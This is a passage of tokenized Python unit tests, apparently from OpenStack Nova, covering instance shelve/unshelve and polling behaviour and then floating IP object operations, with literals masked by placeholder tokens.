<EOL> task_states . 
SHELVING_OFFLOADING ] , <EOL> expected_task_state ) <EOL> tracking [ '<STR_LIT>' ] = instance . vm_state <EOL> else : <EOL> self . fail ( '<STR_LIT>' ) <EOL> self . compute . _notify_about_instance_usage ( self . context , <EOL> instance , '<STR_LIT>' ) <EOL> if CONF . shelved_offload_time == <NUM_LIT:0> : <EOL> self . compute . _notify_about_instance_usage ( self . context , instance , <EOL> '<STR_LIT>' ) <EOL> self . compute . driver . power_off ( instance , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> self . compute . _get_power_state ( self . context , <EOL> instance ) . AndReturn ( <NUM_LIT> ) <EOL> self . compute . _notify_about_instance_usage ( self . context , instance , <EOL> '<STR_LIT>' ) <EOL> self . mox . ReplayAll ( ) <EOL> with mock . patch . object ( instance , '<STR_LIT>' ) as mock_save : <EOL> mock_save . side_effect = check_save <EOL> self . compute . shelve_instance ( self . context , instance , <EOL> image_id = image_id , clean_shutdown = clean_shutdown ) <EOL> def test_shelve ( self ) : <EOL> self . _shelve_instance ( - <NUM_LIT:1> ) <EOL> def test_shelve_forced_shutdown ( self ) : <EOL> self . _shelve_instance ( - <NUM_LIT:1> , clean_shutdown = False ) <EOL> def test_shelve_and_offload ( self ) : <EOL> self . _shelve_instance ( <NUM_LIT:0> ) <EOL> def _shelve_offload ( self , clean_shutdown = True ) : <EOL> host = '<STR_LIT>' <EOL> instance = self . _create_fake_instance_obj ( params = { '<STR_LIT:host>' : host } ) <EOL> instance . task_state = task_states . SHELVING <EOL> instance . save ( ) <EOL> self . useFixture ( utils_fixture . TimeFixture ( ) ) <EOL> self . mox . StubOutWithMock ( self . compute , '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( self . compute . driver , '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( self . compute , '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( self . compute . network_api , <EOL> '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( self . compute , '<STR_LIT>' ) <EOL> self . compute . 
_notify_about_instance_usage ( self . context , instance , <EOL> '<STR_LIT>' ) <EOL> if clean_shutdown : <EOL> self . compute . driver . power_off ( instance , <EOL> CONF . shutdown_timeout , <EOL> self . compute . SHUTDOWN_RETRY_INTERVAL ) <EOL> else : <EOL> self . compute . driver . power_off ( instance , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> self . compute . network_api . cleanup_instance_network_on_host ( <EOL> self . context , instance , instance . host ) <EOL> self . compute . _get_power_state ( self . context , <EOL> instance ) . AndReturn ( <NUM_LIT> ) <EOL> self . compute . _update_resource_tracker ( self . context , instance ) <EOL> self . compute . _notify_about_instance_usage ( self . context , instance , <EOL> '<STR_LIT>' ) <EOL> self . mox . ReplayAll ( ) <EOL> with mock . patch . object ( instance , '<STR_LIT>' ) : <EOL> self . compute . shelve_offload_instance ( self . context , instance , <EOL> clean_shutdown = clean_shutdown ) <EOL> self . assertEqual ( vm_states . SHELVED_OFFLOADED , instance . vm_state ) <EOL> self . assertIsNone ( instance . task_state ) <EOL> def test_shelve_offload ( self ) : <EOL> self . _shelve_offload ( ) <EOL> def test_shelve_offload_forced_shutdown ( self ) : <EOL> self . _shelve_offload ( clean_shutdown = False ) <EOL> def test_unshelve ( self ) : <EOL> instance = self . _create_fake_instance_obj ( ) <EOL> instance . task_state = task_states . UNSHELVING <EOL> instance . save ( ) <EOL> image = { '<STR_LIT:id>' : uuids . image_id } <EOL> node = test_compute . NODENAME <EOL> limits = { } <EOL> filter_properties = { '<STR_LIT>' : limits } <EOL> host = '<STR_LIT>' <EOL> cur_time = timeutils . utcnow ( ) <EOL> sys_meta = dict ( instance . system_metadata ) <EOL> sys_meta [ '<STR_LIT>' ] = cur_time . isoformat ( ) <EOL> sys_meta [ '<STR_LIT>' ] = image [ '<STR_LIT:id>' ] <EOL> sys_meta [ '<STR_LIT>' ] = host <EOL> instance . system_metadata = sys_meta <EOL> self . mox . StubOutWithMock ( self . 
compute , '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( self . compute , '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( self . compute . driver , '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( self . compute , '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( self . rt , '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( self . compute . network_api , <EOL> '<STR_LIT>' ) <EOL> self . deleted_image_id = None <EOL> def fake_delete ( self2 , ctxt , image_id ) : <EOL> self . deleted_image_id = image_id <EOL> def fake_claim ( context , instance , limits ) : <EOL> instance . host = self . compute . host <EOL> return claims . Claim ( context , instance , <EOL> self . rt , _fake_resources ( ) ) <EOL> tracking = { <EOL> '<STR_LIT>' : instance . task_state , <EOL> '<STR_LIT>' : False , <EOL> } <EOL> def check_save ( expected_task_state = None ) : <EOL> if tracking [ '<STR_LIT>' ] == task_states . UNSHELVING : <EOL> if tracking [ '<STR_LIT>' ] : <EOL> self . assertIsNone ( instance . task_state ) <EOL> else : <EOL> self . assertEqual ( task_states . SPAWNING , instance . task_state ) <EOL> tracking [ '<STR_LIT>' ] = True <EOL> tracking [ '<STR_LIT>' ] == instance . task_state <EOL> elif tracking [ '<STR_LIT>' ] == task_states . SPAWNING : <EOL> self . assertEqual ( vm_states . ACTIVE , instance . vm_state ) <EOL> tracking [ '<STR_LIT>' ] == instance . task_state <EOL> else : <EOL> self . fail ( '<STR_LIT>' ) <EOL> fake_image . stub_out_image_service ( self ) <EOL> self . stubs . Set ( fake_image . _FakeImageService , '<STR_LIT>' , fake_delete ) <EOL> self . compute . _notify_about_instance_usage ( self . context , instance , <EOL> '<STR_LIT>' ) <EOL> self . compute . _prep_block_device ( self . context , instance , <EOL> mox . IgnoreArg ( ) , do_check_attach = False ) . AndReturn ( '<STR_LIT>' ) <EOL> self . compute . network_api . setup_instance_network_on_host ( <EOL> self . context , instance , self . compute . host ) <EOL> self . compute . driver . 
spawn ( self . context , instance , <EOL> mox . IsA ( objects . ImageMeta ) , <EOL> injected_files = [ ] , admin_password = None , <EOL> network_info = [ ] , <EOL> block_device_info = '<STR_LIT>' ) <EOL> self . compute . _get_power_state ( self . context , instance ) . AndReturn ( <NUM_LIT> ) <EOL> self . compute . _notify_about_instance_usage ( self . context , instance , <EOL> '<STR_LIT>' ) <EOL> self . mox . ReplayAll ( ) <EOL> with mock . patch . object ( self . rt , '<STR_LIT>' , <EOL> side_effect = fake_claim ) , mock . patch . object ( instance , '<STR_LIT>' ) as mock_save : <EOL> mock_save . side_effect = check_save <EOL> self . compute . unshelve_instance ( <EOL> self . context , instance , image = image , <EOL> filter_properties = filter_properties , <EOL> node = node ) <EOL> self . assertNotIn ( '<STR_LIT>' , instance . system_metadata ) <EOL> self . assertNotIn ( '<STR_LIT>' , instance . system_metadata ) <EOL> self . assertNotIn ( '<STR_LIT>' , instance . system_metadata ) <EOL> self . assertEqual ( image [ '<STR_LIT:id>' ] , self . deleted_image_id ) <EOL> self . assertEqual ( instance . host , self . compute . host ) <EOL> self . assertEqual ( <NUM_LIT> , instance . power_state ) <EOL> self . assertEqual ( vm_states . ACTIVE , instance . vm_state ) <EOL> self . assertIsNone ( instance . task_state ) <EOL> self . assertIsNone ( instance . key_data ) <EOL> self . assertEqual ( self . compute . host , instance . host ) <EOL> self . assertFalse ( instance . auto_disk_config ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_unshelve_volume_backed ( self , mock_image_meta ) : <EOL> instance = self . _create_fake_instance_obj ( ) <EOL> node = test_compute . NODENAME <EOL> limits = { } <EOL> filter_properties = { '<STR_LIT>' : limits } <EOL> instance . task_state = task_states . UNSHELVING <EOL> instance . save ( ) <EOL> image_meta = { '<STR_LIT>' : { '<STR_LIT>' : uuids . image_id } } <EOL> mock_image_meta . return_value = image_meta <EOL> self . mox . 
StubOutWithMock ( self . compute , '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( self . compute , '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( self . compute . driver , '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( self . compute , '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( self . rt , '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( self . compute . network_api , <EOL> '<STR_LIT>' ) <EOL> tracking = { '<STR_LIT>' : instance . task_state } <EOL> def check_save ( expected_task_state = None ) : <EOL> if tracking [ '<STR_LIT>' ] == task_states . UNSHELVING : <EOL> self . assertEqual ( task_states . SPAWNING , instance . task_state ) <EOL> tracking [ '<STR_LIT>' ] = instance . task_state <EOL> elif tracking [ '<STR_LIT>' ] == task_states . SPAWNING : <EOL> self . assertEqual ( <NUM_LIT> , instance . power_state ) <EOL> self . assertEqual ( vm_states . ACTIVE , instance . vm_state ) <EOL> self . assertIsNone ( instance . task_state ) <EOL> self . assertIsNone ( instance . key_data ) <EOL> self . assertFalse ( instance . auto_disk_config ) <EOL> self . assertIsNone ( instance . task_state ) <EOL> tracking [ '<STR_LIT>' ] = instance . task_state <EOL> else : <EOL> self . fail ( '<STR_LIT>' ) <EOL> self . compute . _notify_about_instance_usage ( self . context , instance , <EOL> '<STR_LIT>' ) <EOL> self . compute . _prep_block_device ( self . context , instance , <EOL> mox . IgnoreArg ( ) , do_check_attach = False ) . AndReturn ( '<STR_LIT>' ) <EOL> self . compute . network_api . setup_instance_network_on_host ( <EOL> self . context , instance , self . compute . host ) <EOL> self . rt . instance_claim ( self . context , instance , limits ) . AndReturn ( <EOL> claims . Claim ( self . context , instance , self . rt , <EOL> _fake_resources ( ) ) ) <EOL> self . compute . driver . spawn ( self . context , instance , <EOL> mox . IsA ( objects . 
ImageMeta ) , <EOL> injected_files = [ ] , admin_password = None , <EOL> network_info = [ ] , <EOL> block_device_info = '<STR_LIT>' ) <EOL> self . compute . _get_power_state ( self . context , instance ) . AndReturn ( <NUM_LIT> ) <EOL> self . compute . _notify_about_instance_usage ( self . context , instance , <EOL> '<STR_LIT>' ) <EOL> self . mox . ReplayAll ( ) <EOL> with mock . patch . object ( instance , '<STR_LIT>' ) as mock_save : <EOL> mock_save . side_effect = check_save <EOL> self . compute . unshelve_instance ( self . context , instance , image = None , <EOL> filter_properties = filter_properties , node = node ) <EOL> @ mock . patch . object ( objects . InstanceList , '<STR_LIT>' ) <EOL> def test_shelved_poll_none_offloaded ( self , mock_get_by_filters ) : <EOL> self . flags ( shelved_offload_time = - <NUM_LIT:1> ) <EOL> self . compute . _poll_shelved_instances ( self . context ) <EOL> self . assertEqual ( <NUM_LIT:0> , mock_get_by_filters . call_count ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_shelved_poll_none_exist ( self , mock_older ) : <EOL> self . flags ( shelved_offload_time = <NUM_LIT:1> ) <EOL> mock_older . return_value = False <EOL> with mock . patch . object ( self . compute , '<STR_LIT>' ) as soi : <EOL> self . compute . _poll_shelved_instances ( self . context ) <EOL> self . assertFalse ( soi . called ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_shelved_poll_not_timedout ( self , mock_older ) : <EOL> mock_older . return_value = False <EOL> self . flags ( shelved_offload_time = <NUM_LIT:1> ) <EOL> shelved_time = timeutils . utcnow ( ) <EOL> time_fixture = self . useFixture ( utils_fixture . TimeFixture ( shelved_time ) ) <EOL> time_fixture . advance_time_seconds ( CONF . shelved_offload_time - <NUM_LIT:1> ) <EOL> instance = self . _create_fake_instance_obj ( ) <EOL> instance . vm_state = vm_states . SHELVED <EOL> instance . task_state = None <EOL> instance . host = self . compute . host <EOL> sys_meta = instance . 
system_metadata <EOL> sys_meta [ '<STR_LIT>' ] = shelved_time . isoformat ( ) <EOL> instance . save ( ) <EOL> with mock . patch . object ( self . compute , '<STR_LIT>' ) as soi : <EOL> self . compute . _poll_shelved_instances ( self . context ) <EOL> self . assertFalse ( soi . called ) <EOL> self . assertTrue ( mock_older . called ) <EOL> def test_shelved_poll_timedout ( self ) : <EOL> self . flags ( shelved_offload_time = <NUM_LIT:1> ) <EOL> shelved_time = timeutils . utcnow ( ) <EOL> time_fixture = self . useFixture ( utils_fixture . TimeFixture ( shelved_time ) ) <EOL> time_fixture . advance_time_seconds ( CONF . shelved_offload_time + <NUM_LIT:1> ) <EOL> instance = self . _create_fake_instance_obj ( ) <EOL> instance . vm_state = vm_states . SHELVED <EOL> instance . task_state = None <EOL> instance . host = self . compute . host <EOL> sys_meta = instance . system_metadata <EOL> sys_meta [ '<STR_LIT>' ] = shelved_time . isoformat ( ) <EOL> instance . save ( ) <EOL> data = [ ] <EOL> def fake_soi ( context , instance , ** kwargs ) : <EOL> data . append ( instance . uuid ) <EOL> with mock . patch . object ( self . compute , '<STR_LIT>' ) as soi : <EOL> soi . side_effect = fake_soi <EOL> self . compute . _poll_shelved_instances ( self . context ) <EOL> self . assertTrue ( soi . called ) <EOL> self . assertEqual ( instance . uuid , data [ <NUM_LIT:0> ] ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_shelved_poll_filters_task_state ( self , mock_parse , mock_older ) : <EOL> self . flags ( shelved_offload_time = <NUM_LIT:1> ) <EOL> mock_older . return_value = True <EOL> instance1 = self . _create_fake_instance_obj ( ) <EOL> instance1 . task_state = task_states . SPAWNING <EOL> instance1 . vm_state = vm_states . SHELVED <EOL> instance1 . host = self . compute . host <EOL> instance1 . system_metadata = { '<STR_LIT>' : '<STR_LIT>' } <EOL> instance1 . save ( ) <EOL> instance2 = self . _create_fake_instance_obj ( ) <EOL> instance2 . 
task_state = None <EOL> instance2 . vm_state = vm_states . SHELVED <EOL> instance2 . host = self . compute . host <EOL> instance2 . system_metadata = { '<STR_LIT>' : '<STR_LIT>' } <EOL> instance2 . save ( ) <EOL> data = [ ] <EOL> def fake_soi ( context , instance , ** kwargs ) : <EOL> data . append ( instance . uuid ) <EOL> with mock . patch . object ( self . compute , '<STR_LIT>' ) as soi : <EOL> soi . side_effect = fake_soi <EOL> self . compute . _poll_shelved_instances ( self . context ) <EOL> self . assertTrue ( soi . called ) <EOL> self . assertEqual ( [ instance2 . uuid ] , data ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_shelved_poll_checks_task_state_on_save ( self , mock_parse , <EOL> mock_older ) : <EOL> self . flags ( shelved_offload_time = <NUM_LIT:1> ) <EOL> mock_older . return_value = True <EOL> instance = self . _create_fake_instance_obj ( ) <EOL> instance . task_state = None <EOL> instance . vm_state = vm_states . SHELVED <EOL> instance . host = self . compute . host <EOL> instance . system_metadata = { '<STR_LIT>' : '<STR_LIT>' } <EOL> instance . save ( ) <EOL> def fake_parse_hook ( timestring ) : <EOL> instance . task_state = task_states . SPAWNING <EOL> instance . save ( ) <EOL> mock_parse . side_effect = fake_parse_hook <EOL> with mock . patch . object ( self . compute , '<STR_LIT>' ) as soi : <EOL> self . compute . _poll_shelved_instances ( self . context ) <EOL> self . assertFalse ( soi . called ) <EOL> class ShelveComputeAPITestCase ( test_compute . BaseTestCase ) : <EOL> def test_shelve ( self ) : <EOL> fake_instance = self . _create_fake_instance_obj ( <EOL> { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> instance = fake_instance <EOL> self . assertIsNone ( instance [ '<STR_LIT>' ] ) <EOL> def fake_init ( self2 ) : <EOL> self2 . images = { } <EOL> def fake_create ( self2 , ctxt , metadata , data = None ) : <EOL> self . 
assertEqual ( metadata [ '<STR_LIT:name>' ] , '<STR_LIT>' ) <EOL> metadata [ '<STR_LIT:id>' ] = '<STR_LIT>' <EOL> return metadata <EOL> fake_image . stub_out_image_service ( self ) <EOL> self . stubs . Set ( fake_image . _FakeImageService , '<STR_LIT>' , fake_init ) <EOL> self . stubs . Set ( fake_image . _FakeImageService , '<STR_LIT>' , fake_create ) <EOL> self . compute_api . shelve ( self . context , instance ) <EOL> self . assertEqual ( instance . task_state , task_states . SHELVING ) <EOL> db . instance_destroy ( self . context , instance [ '<STR_LIT>' ] ) <EOL> @ mock . patch . object ( objects . RequestSpec , '<STR_LIT>' ) <EOL> def test_unshelve ( self , get_by_instance_uuid ) : <EOL> instance = self . _create_fake_instance_obj ( ) <EOL> self . assertIsNone ( instance [ '<STR_LIT>' ] ) <EOL> self . compute_api . shelve ( self . context , instance ) <EOL> instance . task_state = None <EOL> instance . vm_state = vm_states . SHELVED <EOL> instance . save ( ) <EOL> fake_spec = objects . RequestSpec ( ) <EOL> get_by_instance_uuid . return_value = fake_spec <EOL> with mock . patch . object ( self . compute_api . compute_task_api , <EOL> '<STR_LIT>' ) as unshelve : <EOL> self . compute_api . unshelve ( self . context , instance ) <EOL> get_by_instance_uuid . assert_called_once_with ( self . context , <EOL> instance . uuid ) <EOL> unshelve . assert_called_once_with ( self . context , instance , fake_spec ) <EOL> self . assertEqual ( instance . task_state , task_states . UNSHELVING ) <EOL> db . instance_destroy ( self . context , instance [ '<STR_LIT>' ] ) </s>
<s> import mock <EOL> import netaddr <EOL> from oslo_versionedobjects import base as ovo_base <EOL> from nova import exception <EOL> from nova import objects <EOL> from nova . objects import floating_ip <EOL> from nova import test <EOL> from nova . tests . unit . api . openstack import fakes <EOL> from nova . tests . unit . objects import test_fixed_ip <EOL> from nova . tests . unit . objects import test_network <EOL> from nova . tests . unit . objects import test_objects <EOL> fake_floating_ip = { <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT:id>' : <NUM_LIT> , <EOL> '<STR_LIT:address>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT:host>' : None , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> } <EOL> class _TestFloatingIPObject ( object ) : <EOL> def _compare ( self , obj , db_obj ) : <EOL> for field in obj . fields : <EOL> if field in floating_ip . FLOATING_IP_OPTIONAL_ATTRS : <EOL> if obj . obj_attr_is_set ( field ) : <EOL> obj_val = obj [ field ] . id <EOL> db_val = db_obj [ field ] [ '<STR_LIT:id>' ] <EOL> else : <EOL> continue <EOL> else : <EOL> obj_val = obj [ field ] <EOL> db_val = db_obj [ field ] <EOL> if isinstance ( obj_val , netaddr . IPAddress ) : <EOL> obj_val = str ( obj_val ) <EOL> self . assertEqual ( db_val , obj_val ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_get_by_id ( self , get ) : <EOL> db_floatingip = dict ( fake_floating_ip , <EOL> fixed_ip = test_fixed_ip . fake_fixed_ip ) <EOL> get . return_value = db_floatingip <EOL> floatingip = floating_ip . FloatingIP . get_by_id ( self . context , <NUM_LIT> ) <EOL> get . assert_called_once_with ( self . context , <NUM_LIT> ) <EOL> self . _compare ( floatingip , db_floatingip ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_get_by_address ( self , get ) : <EOL> get . 
return_value = fake_floating_ip <EOL> floatingip = floating_ip . FloatingIP . get_by_address ( self . context , <EOL> '<STR_LIT>' ) <EOL> get . assert_called_once_with ( self . context , '<STR_LIT>' ) <EOL> self . _compare ( floatingip , fake_floating_ip ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_get_pool_names ( self , get ) : <EOL> get . return_value = [ { '<STR_LIT:name>' : '<STR_LIT:a>' } , { '<STR_LIT:name>' : '<STR_LIT:b>' } ] <EOL> self . assertEqual ( [ '<STR_LIT:a>' , '<STR_LIT:b>' ] , <EOL> floating_ip . FloatingIP . get_pool_names ( self . context ) ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_allocate_address ( self , allocate ) : <EOL> allocate . return_value = '<STR_LIT>' <EOL> self . assertEqual ( '<STR_LIT>' , <EOL> floating_ip . FloatingIP . allocate_address ( self . context , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) ) <EOL> allocate . assert_called_with ( self . context , '<STR_LIT>' , '<STR_LIT>' , <EOL> auto_assigned = False ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_associate ( self , associate ) : <EOL> db_fixed = dict ( test_fixed_ip . fake_fixed_ip , <EOL> network = test_network . fake_network ) <EOL> associate . return_value = db_fixed <EOL> floatingip = floating_ip . FloatingIP . associate ( self . context , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT:host>' ) <EOL> associate . assert_called_with ( self . context , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT:host>' ) <EOL> self . assertEqual ( db_fixed [ '<STR_LIT:id>' ] , floatingip . fixed_ip . id ) <EOL> self . assertEqual ( '<STR_LIT>' , str ( floatingip . address ) ) <EOL> self . assertEqual ( '<STR_LIT:host>' , floatingip . host ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_deallocate ( self , deallocate ) : <EOL> floating_ip . FloatingIP . deallocate ( self . context , '<STR_LIT>' ) <EOL> deallocate . assert_called_with ( self . context , '<STR_LIT>' ) <EOL> @ mock . 
patch ( '<STR_LIT>' ) <EOL> def test_destroy ( self , destroy ) : <EOL> floating_ip . FloatingIP . destroy ( self . context , '<STR_LIT>' ) <EOL> destroy . assert_called_with ( self . context , '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_disassociate ( self , disassociate ) : <EOL> db_fixed = dict ( test_fixed_ip . fake_fixed_ip , <EOL> network = test_network . fake_network ) <EOL> disassociate . return_value = db_fixed <EOL> floatingip = floating_ip . FloatingIP . disassociate ( self . context , <EOL> '<STR_LIT>' ) <EOL> disassociate . assert_called_with ( self . context , '<STR_LIT>' ) <EOL> self . assertEqual ( db_fixed [ '<STR_LIT:id>' ] , floatingip . fixed_ip . id ) <EOL> self . assertEqual ( '<STR_LIT>' , str ( floatingip . address ) ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_save ( self , update ) : <EOL> update . return_value = fake_floating_ip <EOL> floatingip = floating_ip . FloatingIP ( context = self . context , <EOL> id = <NUM_LIT> , address = '<STR_LIT>' , <EOL> host = '<STR_LIT:foo>' ) <EOL> floatingip . obj_reset_changes ( [ '<STR_LIT:address>' , '<STR_LIT:id>' ] ) <EOL> floatingip . save ( ) <EOL> self . assertEqual ( set ( ) , floatingip . obj_what_changed ( ) ) <EOL> update . assert_called_with ( self . context , '<STR_LIT>' , <EOL> { '<STR_LIT:host>' : '<STR_LIT:foo>' } ) <EOL> def test_save_errors ( self ) : <EOL> floatingip = floating_ip . FloatingIP ( context = self . context , <EOL> id = <NUM_LIT> , host = '<STR_LIT:foo>' ) <EOL> floatingip . obj_reset_changes ( ) <EOL> floating_ip . address = '<STR_LIT>' <EOL> self . assertRaises ( exception . ObjectActionError , floatingip . save ) <EOL> floatingip . obj_reset_changes ( ) <EOL> floatingip . fixed_ip_id = <NUM_LIT:1> <EOL> self . assertRaises ( exception . ObjectActionError , floatingip . save ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_save_no_fixedip ( self , update ) : <EOL> update . 
return_value = fake_floating_ip <EOL> floatingip = floating_ip . FloatingIP ( context = self . context , <EOL> id = <NUM_LIT> ) <EOL> floatingip . fixed_ip = objects . FixedIP ( context = self . context , <EOL> id = <NUM_LIT> ) <EOL> self . assertNotIn ( '<STR_LIT>' , update . calls [ <NUM_LIT:1> ] ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_get_all ( self , get ) : <EOL> get . return_value = [ fake_floating_ip ] <EOL> floatingips = floating_ip . FloatingIPList . get_all ( self . context ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( floatingips ) ) <EOL> self . _compare ( floatingips [ <NUM_LIT:0> ] , fake_floating_ip ) <EOL> get . assert_called_with ( self . context ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_get_by_host ( self , get ) : <EOL> get . return_value = [ fake_floating_ip ] <EOL> floatingips = floating_ip . FloatingIPList . get_by_host ( self . context , <EOL> '<STR_LIT:host>' ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( floatingips ) ) <EOL> self . _compare ( floatingips [ <NUM_LIT:0> ] , fake_floating_ip ) <EOL> get . assert_called_with ( self . context , '<STR_LIT:host>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_get_by_project ( self , get ) : <EOL> get . return_value = [ fake_floating_ip ] <EOL> floatingips = floating_ip . FloatingIPList . get_by_project ( self . context , <EOL> '<STR_LIT>' ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( floatingips ) ) <EOL> self . _compare ( floatingips [ <NUM_LIT:0> ] , fake_floating_ip ) <EOL> get . assert_called_with ( self . context , '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_get_by_fixed_address ( self , get ) : <EOL> get . return_value = [ fake_floating_ip ] <EOL> floatingips = floating_ip . FloatingIPList . get_by_fixed_address ( <EOL> self . context , '<STR_LIT>' ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( floatingips ) ) <EOL> self . _compare ( floatingips [ <NUM_LIT:0> ] , fake_floating_ip ) <EOL> get . assert_called_with ( self . 
context , '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_get_by_fixed_ip_id ( self , get ) : <EOL> get . return_value = [ fake_floating_ip ] <EOL> floatingips = floating_ip . FloatingIPList . get_by_fixed_ip_id ( <EOL> self . context , <NUM_LIT> ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( floatingips ) ) <EOL> self . _compare ( floatingips [ <NUM_LIT:0> ] , fake_floating_ip ) <EOL> get . assert_called_with ( self . context , <NUM_LIT> ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_get_addresses_by_instance ( self , get_all ) : <EOL> expected = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> get_all . return_value = list ( expected ) <EOL> ips = floating_ip . FloatingIP . get_addresses_by_instance ( <EOL> self . context , { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . assertEqual ( expected , ips ) <EOL> get_all . assert_called_once_with ( self . context , '<STR_LIT>' ) <EOL> def test_make_ip_info ( self ) : <EOL> result = objects . FloatingIPList . make_ip_info ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assertEqual ( { '<STR_LIT:address>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> result ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_bulk_create ( self , create_mock ) : <EOL> def fake_create ( ctxt , ip_info , want_result = False ) : <EOL> return [ { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:address>' : ip [ '<STR_LIT:address>' ] , '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : fakes . FAKE_PROJECT_ID , '<STR_LIT:host>' : '<STR_LIT:host>' , <EOL> '<STR_LIT>' : False , '<STR_LIT>' : ip [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : ip [ '<STR_LIT>' ] , '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , '<STR_LIT>' : False } <EOL> for ip in ip_info ] <EOL> create_mock . side_effect = fake_create <EOL> ips = [ objects . FloatingIPList . make_ip_info ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> objects . FloatingIPList . 
make_ip_info ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) ] <EOL> result = objects . FloatingIPList . create ( None , ips ) <EOL> self . assertIs ( result , None ) <EOL> result = objects . FloatingIPList . create ( None , ips , want_result = True ) <EOL> self . assertEqual ( '<STR_LIT>' , str ( result [ <NUM_LIT:0> ] . address ) ) <EOL> self . assertEqual ( '<STR_LIT>' , str ( result [ <NUM_LIT:1> ] . address ) ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_bulk_destroy ( self , destroy_mock ) : <EOL> ips = [ { '<STR_LIT:address>' : '<STR_LIT>' } , { '<STR_LIT:address>' : '<STR_LIT>' } ] <EOL> objects . FloatingIPList . destroy ( None , ips ) <EOL> destroy_mock . assert_called_once_with ( None , ips ) <EOL> def test_backport_fixedip_1_1 ( self ) : <EOL> floating = objects . FloatingIP ( ) <EOL> fixed = objects . FixedIP ( ) <EOL> floating . fixed_ip = fixed <EOL> versions = ovo_base . obj_tree_get_versions ( '<STR_LIT>' ) <EOL> versions [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> primitive = floating . obj_to_primitive ( target_version = '<STR_LIT>' , <EOL> version_manifest = versions ) <EOL> self . assertEqual ( '<STR_LIT>' , <EOL> primitive [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] ) <EOL> class TestFloatingIPObject ( test_objects . _LocalTest , <EOL> _TestFloatingIPObject ) : <EOL> pass <EOL> class TestRemoteFloatingIPObject ( test_objects . _RemoteTest , <EOL> _TestFloatingIPObject ) : <EOL> pass <EOL> class TestNeutronFloatingIPObject ( test . NoDBTestCase ) : <EOL> def test_create_with_uuid_id ( self ) : <EOL> uuid = '<STR_LIT>' <EOL> fip = objects . floating_ip . NeutronFloatingIP ( id = uuid ) <EOL> self . assertEqual ( uuid , fip . id ) <EOL> def test_create_with_uuid_fixed_id ( self ) : <EOL> uuid = '<STR_LIT>' <EOL> fip = objects . floating_ip . NeutronFloatingIP ( fixed_ip_id = uuid ) <EOL> self . assertEqual ( uuid , fip . fixed_ip_id ) </s>
